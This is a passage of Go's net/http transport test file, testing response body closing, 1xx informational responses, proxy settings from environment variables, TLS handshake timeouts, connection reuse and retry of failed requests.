2162 func TestTransportCloseResponseBody(t *testing.T) {
2163 defer afterTest(t)
2164 writeErr := make(chan error, 1)
2165 msg := []byte("young\n")
2166 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
2167 for {
2168 _, err := w.Write(msg)
2169 if err != nil {
2170 writeErr <- err
2171 return
2172 }
2173 w.(Flusher).Flush()
2174 }
2175 }))
2176 defer ts.Close()
2177
2178 c := ts.Client()
2179 tr := c.Transport.(*Transport)
2180
2181 req, _ := NewRequest("GET", ts.URL, nil)
2182 defer tr.CancelRequest(req)
2183
2184 res, err := c.Do(req)
2185 if err != nil {
2186 t.Fatal(err)
2187 }
2188
2189 const repeats = 3
2190 buf := make([]byte, len(msg)*repeats)
2191 want := bytes.Repeat(msg, repeats)
2192
2193 _, err = io.ReadFull(res.Body, buf)
2194 if err != nil {
2195 t.Fatal(err)
2196 }
2197 if !bytes.Equal(buf, want) {
2198 t.Fatalf("read %q; want %q", buf, want)
2199 }
2200 didClose := make(chan error, 1)
2201 go func() {
2202 didClose <- res.Body.Close()
2203 }()
2204 select {
2205 case err := <-didClose:
2206 if err != nil {
2207 t.Errorf("Close = %v", err)
2208 }
2209 case <-time.After(10 * time.Second):
2210 t.Fatal("too long waiting for close")
2211 }
2212 select {
2213 case err := <-writeErr:
2214 if err == nil {
2215 t.Errorf("expected non-nil write error")
2216 }
2217 case <-time.After(10 * time.Second):
2218 t.Fatal("too long waiting for write error")
2219 }
2220 }
2221
2222 type fooProto struct{}
2223
2224 func (fooProto) RoundTrip(req *Request) (*Response, error) {
2225 res := &Response{
2226 Status: "200 OK",
2227 StatusCode: 200,
2228 Header: make(Header),
2229 Body: ioutil.NopCloser(strings.NewReader("You wanted " + req.URL.String())),
2230 }
2231 return res, nil
2232 }
2233
2234 func TestTransportAltProto(t *testing.T) {
2235 defer afterTest(t)
2236 tr := &Transport{}
2237 c := &Client{Transport: tr}
2238 tr.RegisterProtocol("foo", fooProto{})
2239 res, err := c.Get("foo://bar.com/path")
2240 if err != nil {
2241 t.Fatal(err)
2242 }
2243 bodyb, err := ioutil.ReadAll(res.Body)
2244 if err != nil {
2245 t.Fatal(err)
2246 }
2247 body := string(bodyb)
2248 if e := "You wanted foo://bar.com/path"; body != e {
2249 t.Errorf("got response %q, want %q", body, e)
2250 }
2251 }
2252
2253 func TestTransportNoHost(t *testing.T) {
2254 defer afterTest(t)
2255 tr := &Transport{}
2256 _, err := tr.RoundTrip(&Request{
2257 Header: make(Header),
2258 URL: &url.URL{
2259 Scheme: "http",
2260 },
2261 })
2262 want := "http: no Host in request URL"
2263 if got := fmt.Sprint(err); got != want {
2264 t.Errorf("error = %v; want %q", err, want)
2265 }
2266 }
2267
2268 // Issue 13311
2269 func TestTransportEmptyMethod(t *testing.T) {
2270 req, _ := NewRequest("GET", "http://foo.com/", nil)
2271 req.Method = "" // docs say "For client requests an empty string means GET"
2272 got, err := httputil.DumpRequestOut(req, false) // DumpRequestOut uses Transport
2273 if err != nil {
2274 t.Fatal(err)
2275 }
2276 if !strings.Contains(string(got), "GET ") {
2277 t.Fatalf("expected substring 'GET '; got: %s", got)
2278 }
2279 }
2280
2281 func TestTransportSocketLateBinding(t *testing.T) {
2282 setParallel(t)
2283 defer afterTest(t)
2284
2285 mux := NewServeMux()
2286 fooGate := make(chan bool, 1)
2287 mux.HandleFunc("/foo", func(w ResponseWriter, r *Request) {
2288 w.Header().Set("foo-ipport", r.RemoteAddr)
2289 w.(Flusher).Flush()
2290 <-fooGate
2291 })
2292 mux.HandleFunc("/bar", func(w ResponseWriter, r *Request) {
2293 w.Header().Set("bar-ipport", r.RemoteAddr)
2294 })
2295 ts := httptest.NewServer(mux)
2296 defer ts.Close()
2297
2298 dialGate := make(chan bool, 1)
2299 c := ts.Client()
2300 c.Transport.(*Transport).Dial = func(n, addr string) (net.Conn, error) {
2301 if <-dialGate {
2302 return net.Dial(n, addr)
2303 }
2304 return nil, errors.New("manually closed")
2305 }
2306
2307 dialGate <- true // only allow one dial
2308 fooRes, err := c.Get(ts.URL + "/foo")
2309 if err != nil {
2310 t.Fatal(err)
2311 }
2312 fooAddr := fooRes.Header.Get("foo-ipport")
2313 if fooAddr == "" {
2314 t.Fatal("No addr on /foo request")
2315 }
2316 time.AfterFunc(200*time.Millisecond, func() {
2317 // let the foo response finish so we can use its
2318 // connection for /bar
2319 fooGate <- true
2320 io.Copy(ioutil.Discard, fooRes.Body)
2321 fooRes.Body.Close()
2322 })
2323
2324 barRes, err := c.Get(ts.URL + "/bar")
2325 if err != nil {
2326 t.Fatal(err)
2327 }
2328 barAddr := barRes.Header.Get("bar-ipport")
2329 if barAddr != fooAddr {
2330 t.Fatalf("/foo came from conn %q; /bar came from %q instead", fooAddr, barAddr)
2331 }
2332 barRes.Body.Close()
2333 dialGate <- false
2334 }
2335
2336 // Issue 2184
2337 func TestTransportReading100Continue(t *testing.T) {
2338 defer afterTest(t)
2339
2340 const numReqs = 5
2341 reqBody := func(n int) string { return fmt.Sprintf("request body %d", n) }
2342 reqID := func(n int) string { return fmt.Sprintf("REQ-ID-%d", n) }
2343
2344 send100Response := func(w *io.PipeWriter, r *io.PipeReader) {
2345 defer w.Close()
2346 defer r.Close()
2347 br := bufio.NewReader(r)
2348 n := 0
2349 for {
2350 n++
2351 req, err := ReadRequest(br)
2352 if err == io.EOF {
2353 return
2354 }
2355 if err != nil {
2356 t.Error(err)
2357 return
2358 }
2359 slurp, err := ioutil.ReadAll(req.Body)
2360 if err != nil {
2361 t.Errorf("Server request body slurp: %v", err)
2362 return
2363 }
2364 id := req.Header.Get("Request-Id")
2365 resCode := req.Header.Get("X-Want-Response-Code")
2366 if resCode == "" {
2367 resCode = "100 Continue"
2368 if string(slurp) != reqBody(n) {
2369 t.Errorf("Server got %q, %v; want %q", slurp, err, reqBody(n))
2370 }
2371 }
2372 body := fmt.Sprintf("Response number %d", n)
2373 v := []byte(strings.Replace(fmt.Sprintf(`HTTP/1.1 %s
2374 Date: Thu, 28 Feb 2013 17:55:41 GMT
2375
2376 HTTP/1.1 200 OK
2377 Content-Type: text/html
2378 Echo-Request-Id: %s
2379 Content-Length: %d
2380
2381 %s`, resCode, id, len(body), body), "\n", "\r\n", -1))
2382 w.Write(v)
2383 if id == reqID(numReqs) {
2384 return
2385 }
2386 }
2387
2388 }
2389
2390 tr := &Transport{
2391 Dial: func(n, addr string) (net.Conn, error) {
2392 sr, sw := io.Pipe() // server read/write
2393 cr, cw := io.Pipe() // client read/write
2394 conn := &rwTestConn{
2395 Reader: cr,
2396 Writer: sw,
2397 closeFunc: func() error {
2398 sw.Close()
2399 cw.Close()
2400 return nil
2401 },
2402 }
2403 go send100Response(cw, sr)
2404 return conn, nil
2405 },
2406 DisableKeepAlives: false,
2407 }
2408 defer tr.CloseIdleConnections()
2409 c := &Client{Transport: tr}
2410
2411 testResponse := func(req *Request, name string, wantCode int) {
2412 t.Helper()
2413 res, err := c.Do(req)
2414 if err != nil {
2415 t.Fatalf("%s: Do: %v", name, err)
2416 }
2417 if res.StatusCode != wantCode {
2418 t.Fatalf("%s: Response Statuscode=%d; want %d", name, res.StatusCode, wantCode)
2419 }
2420 if id, idBack := req.Header.Get("Request-Id"), res.Header.Get("Echo-Request-Id"); id != "" && id != idBack {
2421 t.Errorf("%s: response id %q != request id %q", name, idBack, id)
2422 }
2423 _, err = ioutil.ReadAll(res.Body)
2424 if err != nil {
2425 t.Fatalf("%s: Slurp error: %v", name, err)
2426 }
2427 }
2428
2429 // Few 100 responses, making sure we're not off-by-one.
2430 for i := 1; i <= numReqs; i++ {
2431 req, _ := NewRequest("POST", "http://dummy.tld/", strings.NewReader(reqBody(i)))
2432 req.Header.Set("Request-Id", reqID(i))
2433 testResponse(req, fmt.Sprintf("100, %d/%d", i, numReqs), 200)
2434 }
2435 }
2436
2437 // Issue 17739: the HTTP client must ignore any unknown 1xx
2438 // informational responses before the actual response.
2439 func TestTransportIgnore1xxResponses(t *testing.T) {
2440 setParallel(t)
2441 defer afterTest(t)
2442 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
2443 conn, buf, _ := w.(Hijacker).Hijack()
2444 buf.Write([]byte("HTTP/1.1 123 OneTwoThree\r\nFoo: bar\r\n\r\nHTTP/1.1 200 OK\r\nBar: baz\r\nContent-Length: 5\r\n\r\nHello"))
2445 buf.Flush()
2446 conn.Close()
2447 }))
2448 defer cst.close()
2449 cst.tr.DisableKeepAlives = true // prevent log spam; our test server is hanging up anyway
2450
2451 var got bytes.Buffer
2452
2453 req, _ := NewRequest("GET", cst.ts.URL, nil)
2454 req = req.WithContext(httptrace.WithClientTrace(context.Background(), &httptrace.ClientTrace{
2455 Got1xxResponse: func(code int, header textproto.MIMEHeader) error {
2456 fmt.Fprintf(&got, "1xx: code=%v, header=%v\n", code, header)
2457 return nil
2458 },
2459 }))
2460 res, err := cst.c.Do(req)
2461 if err != nil {
2462 t.Fatal(err)
2463 }
2464 defer res.Body.Close()
2465
2466 res.Write(&got)
2467 want := "1xx: code=123, header=map[Foo:[bar]]\nHTTP/1.1 200 OK\r\nContent-Length: 5\r\nBar: baz\r\n\r\nHello"
2468 if got.String() != want {
2469 t.Errorf(" got: %q\nwant: %q\n", got.Bytes(), want)
2470 }
2471 }
2472
2473 func TestTransportLimits1xxResponses(t *testing.T) {
2474 setParallel(t)
2475 defer afterTest(t)
2476 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
2477 conn, buf, _ := w.(Hijacker).Hijack()
2478 for i := 0; i < 10; i++ {
2479 buf.Write([]byte("HTTP/1.1 123 OneTwoThree\r\n\r\n"))
2480 }
2481 buf.Write([]byte("HTTP/1.1 204 No Content\r\n\r\n"))
2482 buf.Flush()
2483 conn.Close()
2484 }))
2485 defer cst.close()
2486 cst.tr.DisableKeepAlives = true // prevent log spam; our test server is hanging up anyway
2487
2488 res, err := cst.c.Get(cst.ts.URL)
2489 if res != nil {
2490 defer res.Body.Close()
2491 }
2492 got := fmt.Sprint(err)
2493 wantSub := "too many 1xx informational responses"
2494 if !strings.Contains(got, wantSub) {
2495 t.Errorf("Get error = %v; want substring %q", err, wantSub)
2496 }
2497 }
2498
2499 // Issue 26161: the HTTP client must treat 101 responses
2500 // as the final response.
2501 func TestTransportTreat101Terminal(t *testing.T) {
2502 setParallel(t)
2503 defer afterTest(t)
2504 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
2505 conn, buf, _ := w.(Hijacker).Hijack()
2506 buf.Write([]byte("HTTP/1.1 101 Switching Protocols\r\n\r\n"))
2507 buf.Write([]byte("HTTP/1.1 204 No Content\r\n\r\n"))
2508 buf.Flush()
2509 conn.Close()
2510 }))
2511 defer cst.close()
2512 res, err := cst.c.Get(cst.ts.URL)
2513 if err != nil {
2514 t.Fatal(err)
2515 }
2516 defer res.Body.Close()
2517 if res.StatusCode != StatusSwitchingProtocols {
2518 t.Errorf("StatusCode = %v; want 101 Switching Protocols", res.StatusCode)
2519 }
2520 }
2521
2522 type proxyFromEnvTest struct {
2523 req string // URL to fetch; blank means "http://example.com"
2524
2525 env string // HTTP_PROXY
2526 httpsenv string // HTTPS_PROXY
2527 noenv string // NO_PROXY
2528 reqmeth string // REQUEST_METHOD
2529
2530 want string
2531 wanterr error
2532 }
2533
2534 func (t proxyFromEnvTest) String() string {
2535 var buf bytes.Buffer
2536 space := func() {
2537 if buf.Len() > 0 {
2538 buf.WriteByte(' ')
2539 }
2540 }
2541 if t.env != "" {
2542 fmt.Fprintf(&buf, "http_proxy=%q", t.env)
2543 }
2544 if t.httpsenv != "" {
2545 space()
2546 fmt.Fprintf(&buf, "https_proxy=%q", t.httpsenv)
2547 }
2548 if t.noenv != "" {
2549 space()
2550 fmt.Fprintf(&buf, "no_proxy=%q", t.noenv)
2551 }
2552 if t.reqmeth != "" {
2553 space()
2554 fmt.Fprintf(&buf, "request_method=%q", t.reqmeth)
2555 }
2556 req := "http://example.com"
2557 if t.req != "" {
2558 req = t.req
2559 }
2560 space()
2561 fmt.Fprintf(&buf, "req=%q", req)
2562 return strings.TrimSpace(buf.String())
2563 }
2564
2565 var proxyFromEnvTests = []proxyFromEnvTest{
2566 {env: "127.0.0.1:8080", want: "http://127.0.0.1:8080"},
2567 {env: "cache.corp.example.com:1234", want: "http://cache.corp.example.com:1234"},
2568 {env: "cache.corp.example.com", want: "http://cache.corp.example.com"},
2569 {env: "https://cache.corp.example.com", want: "https://cache.corp.example.com"},
2570 {env: "http://127.0.0.1:8080", want: "http://127.0.0.1:8080"},
2571 {env: "https://127.0.0.1:8080", want: "https://127.0.0.1:8080"},
2572 {env: "socks5://127.0.0.1", want: "socks5://127.0.0.1"},
2573
2574 // Don't use secure for http
2575 {req: "http://insecure.tld/", env: "http.proxy.tld", httpsenv: "secure.proxy.tld", want: "http://http.proxy.tld"},
2576 // Use secure for https.
2577 {req: "https://secure.tld/", env: "http.proxy.tld", httpsenv: "secure.proxy.tld", want: "http://secure.proxy.tld"},
2578 {req: "https://secure.tld/", env: "http.proxy.tld", httpsenv: "https://secure.proxy.tld", want: "https://secure.proxy.tld"},
2579
2580 // Issue 16405: don't use HTTP_PROXY in a CGI environment,
2581 // where HTTP_PROXY can be attacker-controlled.
2582 {env: "http://10.1.2.3:8080", reqmeth: "POST",
2583 want: "<nil>",
2584 wanterr: errors.New("refusing to use HTTP_PROXY value in CGI environment; see golang.org/s/cgihttpproxy")},
2585
2586 {want: "<nil>"},
2587
2588 {noenv: "example.com", req: "http://example.com/", env: "proxy", want: "<nil>"},
2589 {noenv: ".example.com", req: "http://example.com/", env: "proxy", want: "http://proxy"},
2590 {noenv: "ample.com", req: "http://example.com/", env: "proxy", want: "http://proxy"},
2591 {noenv: "example.com", req: "http://foo.example.com/", env: "proxy", want: "<nil>"},
2592 {noenv: ".foo.com", req: "http://example.com/", env: "proxy", want: "http://proxy"},
2593 }
2594
2595 func testProxyForRequest(t *testing.T, tt proxyFromEnvTest, proxyForRequest func(req *Request) (*url.URL, error)) {
2596 t.Helper()
2597 reqURL := tt.req
2598 if reqURL == "" {
2599 reqURL = "http://example.com"
2600 }
2601 req, _ := NewRequest("GET", reqURL, nil)
2602 url, err := proxyForRequest(req)
2603 if g, e := fmt.Sprintf("%v", err), fmt.Sprintf("%v", tt.wanterr); g != e {
2604 t.Errorf("%v: got error = %q, want %q", tt, g, e)
2605 return
2606 }
2607 if got := fmt.Sprintf("%s", url); got != tt.want {
2608 t.Errorf("%v: got URL = %q, want %q", tt, url, tt.want)
2609 }
2610 }
2611
2612 func TestProxyFromEnvironment(t *testing.T) {
2613 ResetProxyEnv()
2614 defer ResetProxyEnv()
2615 for _, tt := range proxyFromEnvTests {
2616 testProxyForRequest(t, tt, func(req *Request) (*url.URL, error) {
2617 os.Setenv("HTTP_PROXY", tt.env)
2618 os.Setenv("HTTPS_PROXY", tt.httpsenv)
2619 os.Setenv("NO_PROXY", tt.noenv)
2620 os.Setenv("REQUEST_METHOD", tt.reqmeth)
2621 ResetCachedEnvironment()
2622 return ProxyFromEnvironment(req)
2623 })
2624 }
2625 }
2626
2627 func TestProxyFromEnvironmentLowerCase(t *testing.T) {
2628 ResetProxyEnv()
2629 defer ResetProxyEnv()
2630 for _, tt := range proxyFromEnvTests {
2631 testProxyForRequest(t, tt, func(req *Request) (*url.URL, error) {
2632 os.Setenv("http_proxy", tt.env)
2633 os.Setenv("https_proxy", tt.httpsenv)
2634 os.Setenv("no_proxy", tt.noenv)
2635 os.Setenv("REQUEST_METHOD", tt.reqmeth)
2636 ResetCachedEnvironment()
2637 return ProxyFromEnvironment(req)
2638 })
2639 }
2640 }
2641
2642 func TestIdleConnChannelLeak(t *testing.T) {
2643 // Not parallel: uses global test hooks.
2644 var mu sync.Mutex
2645 var n int
2646
2647 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
2648 mu.Lock()
2649 n++
2650 mu.Unlock()
2651 }))
2652 defer ts.Close()
2653
2654 const nReqs = 5
2655 didRead := make(chan bool, nReqs)
2656 SetReadLoopBeforeNextReadHook(func() { didRead <- true })
2657 defer SetReadLoopBeforeNextReadHook(nil)
2658
2659 c := ts.Client()
2660 tr := c.Transport.(*Transport)
2661 tr.Dial = func(netw, addr string) (net.Conn, error) {
2662 return net.Dial(netw, ts.Listener.Addr().String())
2663 }
2664
2665 // First, without keep-alives.
2666 for _, disableKeep := range []bool{true, false} {
2667 tr.DisableKeepAlives = disableKeep
2668 for i := 0; i < nReqs; i++ {
2669 _, err := c.Get(fmt.Sprintf("http://foo-host-%d.tld/", i))
2670 if err != nil {
2671 t.Fatal(err)
2672 }
2673 // Note: no res.Body.Close is needed here, since the
2674 // response Content-Length is zero. Perhaps the test
2675 // should be more explicit and use a HEAD, but tests
2676 // elsewhere guarantee that zero byte responses generate
2677 // a "Content-Length: 0" instead of chunking.
2678 }
2679
2680 // At this point, each of the 5 Transport.readLoop goroutines
2681 // are scheduling noting that there are no response bodies (see
2682 // earlier comment), and are then calling putIdleConn, which
2683 // decrements this count. Usually that happens quickly, which is
2684 // why this test has seemed to work for ages. But it's still
2685 // racey: we have wait for them to finish first. See Issue 10427
2686 for i := 0; i < nReqs; i++ {
2687 <-didRead
2688 }
2689
2690 if got := tr.IdleConnChMapSizeForTesting(); got != 0 {
2691 t.Fatalf("ForDisableKeepAlives = %v, map size = %d; want 0", disableKeep, got)
2692 }
2693 }
2694 }
2695
2696 // Verify the status quo: that the Client.Post function coerces its
2697 // body into a ReadCloser if it's a Closer, and that the Transport
2698 // then closes it.
2699 func TestTransportClosesRequestBody(t *testing.T) {
2700 defer afterTest(t)
2701 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
2702 io.Copy(ioutil.Discard, r.Body)
2703 }))
2704 defer ts.Close()
2705
2706 c := ts.Client()
2707
2708 closes := 0
2709
2710 res, err := c.Post(ts.URL, "text/plain", countCloseReader{&closes, strings.NewReader("hello")})
2711 if err != nil {
2712 t.Fatal(err)
2713 }
2714 res.Body.Close()
2715 if closes != 1 {
2716 t.Errorf("closes = %d; want 1", closes)
2717 }
2718 }
2719
2720 func TestTransportTLSHandshakeTimeout(t *testing.T) {
2721 defer afterTest(t)
2722 if testing.Short() {
2723 t.Skip("skipping in short mode")
2724 }
2725 ln := newLocalListener(t)
2726 defer ln.Close()
2727 testdonec := make(chan struct{})
2728 defer close(testdonec)
2729
2730 go func() {
2731 c, err := ln.Accept()
2732 if err != nil {
2733 t.Error(err)
2734 return
2735 }
2736 <-testdonec
2737 c.Close()
2738 }()
2739
2740 getdonec := make(chan struct{})
2741 go func() {
2742 defer close(getdonec)
2743 tr := &Transport{
2744 Dial: func(_, _ string) (net.Conn, error) {
2745 return net.Dial("tcp", ln.Addr().String())
2746 },
2747 TLSHandshakeTimeout: 250 * time.Millisecond,
2748 }
2749 cl := &Client{Transport: tr}
2750 _, err := cl.Get("https://dummy.tld/")
2751 if err == nil {
2752 t.Error("expected error")
2753 return
2754 }
2755 ue, ok := err.(*url.Error)
2756 if !ok {
2757 t.Errorf("expected url.Error; got %#v", err)
2758 return
2759 }
2760 ne, ok := ue.Err.(net.Error)
2761 if !ok {
2762 t.Errorf("expected net.Error; got %#v", err)
2763 return
2764 }
2765 if !ne.Timeout() {
2766 t.Errorf("expected timeout error; got %v", err)
2767 }
2768 if !strings.Contains(err.Error(), "handshake timeout") {
2769 t.Errorf("expected 'handshake timeout' in error; got %v", err)
2770 }
2771 }()
2772 select {
2773 case <-getdonec:
2774 case <-time.After(5 * time.Second):
2775 t.Error("test timeout; TLS handshake hung?")
2776 }
2777 }
2778
2779 // Trying to repro golang.org/issue/3514
2780 func TestTLSServerClosesConnection(t *testing.T) {
2781 defer afterTest(t)
2782
2783 closedc := make(chan bool, 1)
2784 ts := httptest.NewTLSServer(HandlerFunc(func(w ResponseWriter, r *Request) {
2785 if strings.Contains(r.URL.Path, "/keep-alive-then-die") {
2786 conn, _, _ := w.(Hijacker).Hijack()
2787 conn.Write([]byte("HTTP/1.1 200 OK\r\nContent-Length: 3\r\n\r\nfoo"))
2788 conn.Close()
2789 closedc <- true
2790 return
2791 }
2792 fmt.Fprintf(w, "hello")
2793 }))
2794 defer ts.Close()
2795
2796 c := ts.Client()
2797 tr := c.Transport.(*Transport)
2798
2799 var nSuccess = 0
2800 var errs []error
2801 const trials = 20
2802 for i := 0; i < trials; i++ {
2803 tr.CloseIdleConnections()
2804 res, err := c.Get(ts.URL + "/keep-alive-then-die")
2805 if err != nil {
2806 t.Fatal(err)
2807 }
2808 <-closedc
2809 slurp, err := ioutil.ReadAll(res.Body)
2810 if err != nil {
2811 t.Fatal(err)
2812 }
2813 if string(slurp) != "foo" {
2814 t.Errorf("Got %q, want foo", slurp)
2815 }
2816
2817 // Now try again and see if we successfully
2818 // pick a new connection.
2819 res, err = c.Get(ts.URL + "/")
2820 if err != nil {
2821 errs = append(errs, err)
2822 continue
2823 }
2824 slurp, err = ioutil.ReadAll(res.Body)
2825 if err != nil {
2826 errs = append(errs, err)
2827 continue
2828 }
2829 nSuccess++
2830 }
2831 if nSuccess > 0 {
2832 t.Logf("successes = %d of %d", nSuccess, trials)
2833 } else {
2834 t.Errorf("All runs failed:")
2835 }
2836 for _, err := range errs {
2837 t.Logf(" err: %v", err)
2838 }
2839 }
2840
2841 // byteFromChanReader is an io.Reader that reads a single byte at a
2842 // time from the channel. When the channel is closed, the reader
2843 // returns io.EOF.
2844 type byteFromChanReader chan byte
2845
2846 func (c byteFromChanReader) Read(p []byte) (n int, err error) {
2847 if len(p) == 0 {
2848 return
2849 }
2850 b, ok := <-c
2851 if !ok {
2852 return 0, io.EOF
2853 }
2854 p[0] = b
2855 return 1, nil
2856 }
2857
2858 // Verifies that the Transport doesn't reuse a connection in the case
2859 // where the server replies before the request has been fully
2860 // written. We still honor that reply (see TestIssue3595), but don't
2861 // send future requests on the connection because it's then in a
2862 // questionable state.
2863 // golang.org/issue/7569
2864 func TestTransportNoReuseAfterEarlyResponse(t *testing.T) {
2865 setParallel(t)
2866 defer afterTest(t)
2867 var sconn struct {
2868 sync.Mutex
2869 c net.Conn
2870 }
2871 var getOkay bool
2872 closeConn := func() {
2873 sconn.Lock()
2874 defer sconn.Unlock()
2875 if sconn.c != nil {
2876 sconn.c.Close()
2877 sconn.c = nil
2878 if !getOkay {
2879 t.Logf("Closed server connection")
2880 }
2881 }
2882 }
2883 defer closeConn()
2884
2885 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
2886 if r.Method == "GET" {
2887 io.WriteString(w, "bar")
2888 return
2889 }
2890 conn, _, _ := w.(Hijacker).Hijack()
2891 sconn.Lock()
2892 sconn.c = conn
2893 sconn.Unlock()
2894 conn.Write([]byte("HTTP/1.1 200 OK\r\nContent-Length: 3\r\n\r\nfoo")) // keep-alive
2895 go io.Copy(ioutil.Discard, conn)
2896 }))
2897 defer ts.Close()
2898 c := ts.Client()
2899
2900 const bodySize = 256 << 10
2901 finalBit := make(byteFromChanReader, 1)
2902 req, _ := NewRequest("POST", ts.URL, io.MultiReader(io.LimitReader(neverEnding('x'), bodySize-1), finalBit))
2903 req.ContentLength = bodySize
2904 res, err := c.Do(req)
2905 if err := wantBody(res, err, "foo"); err != nil {
2906 t.Errorf("POST response: %v", err)
2907 }
2908 donec := make(chan bool)
2909 go func() {
2910 defer close(donec)
2911 res, err = c.Get(ts.URL)
2912 if err := wantBody(res, err, "bar"); err != nil {
2913 t.Errorf("GET response: %v", err)
2914 return
2915 }
2916 getOkay = true // suppress test noise
2917 }()
2918 time.AfterFunc(5*time.Second, closeConn)
2919 select {
2920 case <-donec:
2921 finalBit <- 'x' // unblock the writeloop of the first Post
2922 close(finalBit)
2923 case <-time.After(7 * time.Second):
2924 t.Fatal("timeout waiting for GET request to finish")
2925 }
2926 }
2927
2928 // Tests that we don't leak Transport persistConn.readLoop goroutines
2929 // when a server hangs up immediately after saying it would keep-alive.
2930 func TestTransportIssue10457(t *testing.T) {
2931 defer afterTest(t) // used to fail in goroutine leak check
2932 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
2933 // Send a response with no body, keep-alive
2934 // (implicit), and then lie and immediately close the
2935 // connection. This forces the Transport's readLoop to
2936 // immediately Peek an io.EOF and get to the point
2937 // that used to hang.
2938 conn, _, _ := w.(Hijacker).Hijack()
2939 conn.Write([]byte("HTTP/1.1 200 OK\r\nFoo: Bar\r\nContent-Length: 0\r\n\r\n")) // keep-alive
2940 conn.Close()
2941 }))
2942 defer ts.Close()
2943 c := ts.Client()
2944
2945 res, err := c.Get(ts.URL)
2946 if err != nil {
2947 t.Fatalf("Get: %v", err)
2948 }
2949 defer res.Body.Close()
2950
2951 // Just a sanity check that we at least get the response. The real
2952 // test here is that the "defer afterTest" above doesn't find any
2953 // leaked goroutines.
2954 if got, want := res.Header.Get("Foo"), "Bar"; got != want {
2955 t.Errorf("Foo header = %q; want %q", got, want)
2956 }
2957 }
2958
2959 type errorReader struct {
2960 err error
2961 }
2962
2963 func (e errorReader) Read(p []byte) (int, error) { return 0, e.err }
2964
2965 type closerFunc func() error
2966
2967 func (f closerFunc) Close() error { return f() }
2968
2969 type writerFuncConn struct {
2970 net.Conn
2971 write func(p []byte) (n int, err error)
2972 }
2973
2974 func (c writerFuncConn) Write(p []byte) (n int, err error) { return c.write(p) }
2975
2976 // Issues 4677, 18241, and 17844. If we try to reuse a connection that the
2977 // server is in the process of closing, we may end up successfully writing out
2978 // our request (or a portion of our request) only to find a connection error
2979 // when we try to read from (or finish writing to) the socket.
2980 //
2981 // NOTE: we resend a request only if:
2982 // - we reused a keep-alive connection
2983 // - we haven't yet received any header data
2984 // - either we wrote no bytes to the server, or the request is idempotent
2985 // This automatically prevents an infinite resend loop because we'll run out of
2986 // the cached keep-alive connections eventually.
2987 func TestRetryRequestsOnError(t *testing.T) {
2988 newRequest := func(method, urlStr string, body io.Reader) *Request {
2989 req, err := NewRequest(method, urlStr, body)
2990 if err != nil {
2991 t.Fatal(err)
2992 }
2993 return req
2994 }
2995
2996 testCases := []struct {
2997 name string
2998 failureN int
2999 failureErr error
3000 // Note that we can't just re-use the Request object across calls to c.Do
3001 // because we need to rewind Body between calls. (GetBody is only used to
3002 // rewind Body on failure and redirects, not just because it's done.)
3003 req func() *Request
3004 reqString string
3005 }{
3006 {
3007 name: "IdempotentNoBodySomeWritten",
3008 // Believe that we've written some bytes to the server, so we know we're
3009 // not just in the "retry when no bytes sent" case".
3010 failureN: 1,
3011 // Use the specific error that shouldRetryRequest looks for with idempotent requests.
3012 failureErr: ExportErrServerClosedIdle,
3013 req: func() *Request {
3014 return newRequest("GET", "http://fake.golang", nil)
3015 },
3016 reqString: `GET / HTTP/1.1\r\nHost: fake.golang\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\n\r\n`,
3017 },
3018 {
3019 name: "IdempotentGetBodySomeWritten",
3020 // Believe that we've written some bytes to the server, so we know we're
3021 // not just in the "retry when no bytes sent" case".
3022 failureN: 1,
3023 // Use the specific error that shouldRetryRequest looks for with idempotent requests.
3024 failureErr: ExportErrServerClosedIdle,
3025 req: func() *Request {
3026 return newRequest("GET", "http://fake.golang", strings.NewReader("foo\n"))
3027 },
3028 reqString: `GET / HTTP/1.1\r\nHost: fake.golang\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 4\r\nAccept-Encoding: gzip\r\n\r\nfoo\n`,
3029 },
3030 {
3031 name: "NothingWrittenNoBody",
3032 // It's key that we return 0 here -- that's what enables Transport to know
3033 // that nothing was written, even though this is a non-idempotent request.
3034 failureN: 0,
3035 failureErr: errors.New("second write fails"),
3036 req: func() *Request {
3037 return newRequest("DELETE", "http://fake.golang", nil)
3038 },
3039 reqString: `DELETE / HTTP/1.1\r\nHost: fake.golang\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\n\r\n`,
3040 },
3041 {
3042 name: "NothingWrittenGetBody",
3043 // It's key that we return 0 here -- that's what enables Transport to know
3044 // that nothing was written, even though this is a non-idempotent request.
3045 failureN: 0,
3046 failureErr: errors.New("second write fails"),
3047 // Note that NewRequest will set up GetBody for strings.Reader, which is
3048 // required for the retry to occur
3049 req: func() *Request {
3050 return newRequest("POST", "http://fake.golang", strings.NewReader("foo\n"))
3051 },
3052 reqString: `POST / HTTP/1.1\r\nHost: fake.golang\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 4\r\nAccept-Encoding: gzip\r\n\r\nfoo\n`,
3053 },
3054 }
3055
3056 for _, tc := range testCases {
3057 t.Run(tc.name, func(t *testing.T) {
3058 defer afterTest(t)
3059
3060 var (
3061 mu sync.Mutex
3062 logbuf bytes.Buffer
3063 )
3064 logf := func(format string, args ...interface{}) {
3065 mu.Lock()
3066 defer mu.Unlock()
3067 fmt.Fprintf(&logbuf, format, args...)
3068 logbuf.WriteByte('\n')
3069 }
3070
3071 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
3072 logf("Handler")
3073 w.Header().Set("X-Status", "ok")
3074 }))
3075 defer ts.Close()
3076
3077 var writeNumAtomic int32
3078 c := ts.Client()
3079 c.Transport.(*Transport).Dial = func(network, addr string) (net.Conn, error) {
3080 logf("Dial")
3081 c, err := net.Dial(network, ts.Listener.Addr().String())
3082 if err != nil {
3083 logf("Dial error: %v", err)
3084 return nil, err
3085 }
3086 return &writerFuncConn{
3087 Conn: c,
3088 write: func(p []byte) (n int, err error) {
3089 if atomic.AddInt32(&writeNumAtomic, 1) == 2 {
3090 logf("intentional write failure")
3091 return tc.failureN, tc.failureErr
